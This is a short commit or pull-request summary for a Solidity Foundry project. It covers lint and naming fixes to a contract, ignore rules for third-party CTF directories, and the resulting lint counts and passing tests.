- Fix wkeyDAO.sol: constants to SCREAMING_SNAKE_CASE, fix function names, add require on transfer
- Configure .solhintignore to exclude third-party CTF directories
- Add [lint] ignore config in foundry.toml for DVDeFi and ONLYPWNER

Result: forge lint 288→0, forge fmt clean, solhint 374→120, all 24 tests passing.